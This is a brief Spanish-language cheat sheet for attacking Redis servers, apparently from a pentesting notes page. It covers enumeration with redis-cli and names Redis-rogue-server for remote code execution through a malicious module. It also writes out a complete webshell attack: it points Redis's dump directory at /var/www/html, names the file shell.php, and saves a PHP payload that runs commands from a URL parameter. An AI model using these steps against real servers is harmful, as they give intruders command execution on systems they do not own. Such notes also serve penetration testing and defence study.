Enumeración

redis-cli -h <IP>
# Si pide pass: redis-cli -h <IP> -a <pass>

Comandos

INFO keyspace      # Ver DBs
SELECT 0           # Usar DB
KEYS * # Listar
GET <key>          # Leer

RCE (Redis Rogue)

Usa Redis-rogue-server para subir módulo malicioso.

RCE (Webshell)

Si corre como root y sabes ruta web:

config set dir /var/www/html
config set dbfilename shell.php
set test "<?php system($_GET['cmd']); ?>"
save

Categories:

Updated: